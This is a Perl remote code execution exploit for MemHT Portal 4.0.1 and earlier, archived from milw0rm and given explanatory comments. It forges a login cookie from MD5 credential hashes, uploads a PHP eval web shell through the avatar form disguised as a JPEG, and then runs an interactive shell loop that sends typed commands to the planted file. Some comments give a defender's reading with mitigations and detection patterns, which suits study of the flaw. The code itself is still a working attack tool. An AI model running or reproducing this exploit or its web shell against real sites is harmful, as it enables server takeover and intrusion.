
#!/usr/bin/perl
# MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit
# by yeat - staker[at]hotmail[dot]it
use Getopt::Std;
use Digest::MD5('md5_hex');
use LWP::UserAgent;
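# Parse the optional "-p proxy" flag first; Getopt::Std removes it from @ARGV
# so the positional arguments below line up. Note that getopts stops at the
# first non-option argument, so the flag is only recognised when it precedes
# the positional arguments.
getopts('p:', \my %opts);

# Positional arguments: target host/path, name of the file to upload, numeric
# user id, and the credentials of an existing account (see Main::Usage).
# The argument count is only checked inside Main::RunExploit, after the
# values below have already been derived from them.
my ($host, $file, $id, $username, $password) = @ARGV;

# Direct class-method call rather than indirect-object syntax
# (`new LWP::UserAgent`), which Perl can mis-parse when a sub named `new`
# is in scope; the resulting object is identical.
my $http = LWP::UserAgent->new;

my $u_agent = "Lynx (textmode)";

# Session cookie in the format the portal expects: the user id followed by
# the unsalted MD5 of the username and of the password, '#'-separated.
# From a defender's view this is a weakness in the portal itself: the cookie
# is entirely client-constructible, carries credential hashes, and an
# unsalted MD5 gives the password little protection if the cookie is
# captured in transit or from logs.
my $cookies = "login_user=$id#" . md5_hex($username) . "#" . md5_hex($password);

# Entry point; all flow control lives in package Main below.
Main::RunExploit();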
# Main Package
# Everything from here to the next `package` statement belongs to Main:
# the usage banner (Usage) and the top-level flow (RunExploit). Both read
# the file-scoped lexicals declared above (%opts, $u_agent, $file).
package Main;
# Print the usage banner to STDOUT and return print's status (true on
# success), so callers can use the call as their own return value.
# The banner is a non-interpolating heredoc: it contains no variables,
# and the single quotes make that explicit.
sub Usage {
    my $banner = <<'EOF';
+--------------------------------------------------------------+
| MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit |
+--------------------------------------------------------------+
by yeat - staker[at]hotmail[dot]it

Usage: perl xpl.pl host/path file id user pass [OPTIONS]
host: target host and memht path
file: file to upload
user: valid username
pass: valid password
id: user id

Options:

-p [specify a proxy] [server]:[port]

Example:
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure
perl xpl.pl localhost/memht yeat.php 38 MrJack obscure -p 213.151.89.109:80

EOF
    return print $banner;
}
# Top-level flow: configure the optional proxy, validate the positional
# argument count, then set the user agent, log in and run the upload.
# Prints the usage banner (and returns its status) when the count is off.
# Reads the file-scoped %opts, $u_agent and $file.
sub RunExploit
{
    HTTP::Proxy($opts{p}) if defined $opts{p};

    my $argc = scalar @ARGV;
    if ($argc < 5 or $argc > 7) {
        return Main::Usage();
    }

    HTTP::UserAgent($u_agent);
    MemHT::Login();
    return MemHT::Exploit($file);
}
# MemHT Exploit Package
# Portal-specific steps: Login (cookie-based session check) and Exploit
# (avatar upload followed by an interactive loop). Both depend on the
# file-scoped $http, $host and $cookies.
package MemHT;
# Submit a PHP file through the avatar field of the profile-edit form and,
# if the portal appears to accept it, loop reading commands from STDIN and
# sending each one to the uploaded file. Argument: the file name to use for
# the upload, which also becomes the path under images/avatar/uploaded/.
# Uses the file-scoped $http and $host.
#
# Defender's view: the weakness exercised here is an avatar upload that
# trusts the client-supplied Content-Type and keeps the client-supplied
# file name and extension, then stores the result under the web root where
# it is served (and, with a .php name, executed). Mitigations: whitelist
# extensions and re-encode images server-side, rename uploads, and store
# them outside the document root or in a directory with script execution
# disabled. Detection: POSTs to page=users&op=editProfile whose multipart
# body contains a part starting with "<?php", and GET requests for
# images/avatar/uploaded/*.php carrying a "cmd" query parameter.
sub Exploit
{
my $resp;
my $file = shift(@_);
# Profile-edit handler that processes the avatar upload.
my $path = "/index.php?page=users&op=editProfile";

# Form fields in the shape LWP's multipart encoder expects: the avatar value
# is an array ref [local_file, remote_name, Header => value, ...]. With undef
# as the local file, the "Content" entry supplies the part body, so nothing
# is read from disk; Content_Type labels the part as image/jpeg regardless.
my $data = {
chg_email => 'yeat@doesntexist.net',
avatar => [
undef,
$file,
Content_Type => 'image/jpeg',
Content => '<?php error_reporting(E_ALL); eval($_REQUEST[\'cmd\']); ?>',
# Content => 'Here you can write everything :) this is an example!',
],
chg => 'true',
Submit => 'Modify',
};

# The trailing Content_Type => 'multipart/form-data' makes LWP multipart-
# encode the hash ref instead of urlencoding it (needed for the file part).
my $send = $http->post('http://'.$host.$path,
$data,
Content_Type => 'multipart/form-data',
);

# Success heuristic: a response containing "logout" anywhere (headers or
# body) is taken to mean the session was accepted and the form processed.
# It does not confirm that the file was actually stored.
if ($send->as_string =~ m{logout}i) {
print "File Uploaded! / $host/images/avatar/uploaded/$file\n\n";

# Interactive loop with no exit condition: on STDIN EOF $content becomes
# undef and the loop keeps issuing empty requests. The typed text is placed
# in the query string as-is (no URI escaping).
while (1) {
print "\n[yeat-PHPshell]:~# ";
chomp(my $content = <STDIN>);
$resp = HTTP::GET("$host/images/avatar/uploaded/$file?cmd=$content");
print $resp->content;
}
}
else {
print "Exploit Failed!\n";
exit;
}
}
# Attach the pre-built session cookie to the shared user agent and request a
# page that requires a login. A body containing "access denied" is treated
# as a failed login and terminates the process; anything else is taken as
# success, so this is a heuristic rather than a positive confirmation.
# Because the cookie is built purely from the user id and credential hashes
# (see $cookies in the main script), the portal appears to accept a
# client-constructed cookie without any server-side session — a finding in
# its own right. Uses the file-scoped $host and $cookies.
sub Login
{
    HTTP::Cookies($cookies);
    my $probe_url = join '', $host, '/index.php?page=pvtmsg&op=newMessage';
    my $page      = HTTP::GET($probe_url);
    my $denied    = $page->content =~ m{access denied}i;
    if ($denied) {
        print "Login Failed!\n";
        exit;
    }
}
# HTTP Package
# Thin wrappers around the shared LWP::UserAgent held in $http. The package
# name shares the HTTP:: prefix with LWP's own HTTP::Request/HTTP::Response
# modules, which is a readability hazard even though nothing on this page
# collides with them.
package HTTP;
# Set the Cookie header sent on every request by the shared user agent.
# Argument: the raw cookie string. Returns whatever default_header returns.
sub Cookies
{
    my ($cookie_value) = @_;
    return $http->default_header(Cookie => $cookie_value);
}
# Set the User-Agent string of the shared user agent.
# Argument: the agent string. Returns whatever $http->agent returns.
sub UserAgent
{
    my ($agent_string) = @_;
    return $http->agent($agent_string);
}
# GET a URL through the shared user agent, prefixing "http://" when the
# argument does not already start with it. Returns the HTTP::Response.
sub GET
{
    my ($target) = @_;
    $target = 'http://' . $target unless $target =~ m{^http://.+$}i;
    return $http->get($target);
}
# POST to a URL (with no body) through the shared user agent, prefixing
# "http://" when the argument does not already start with it. Returns the
# HTTP::Response. Nothing visible in this file calls it; Exploit uses
# $http->post directly because it needs the multipart form arguments.
sub POST
{
    my ($target) = @_;
    $target = 'http://' . $target unless $target =~ m{^http://.+$}i;
    return $http->post($target);
}
# Read back a default header of the shared user agent by name (single-
# argument default_header call). Not called by anything visible here.
sub http_header
{
    my ($header_name) = @_;
    return $http->default_header($header_name);
}
# Route all http:// requests of the shared user agent through a proxy.
# Argument: "server:port" as given on the command line; the http:// scheme
# is prepended here. Returns whatever $http->proxy returns.
sub Proxy
{
    my ($proxy_addr) = @_;
    return $http->proxy('http', "http://$proxy_addr");
}
# milw0rm.com [2009-01-25]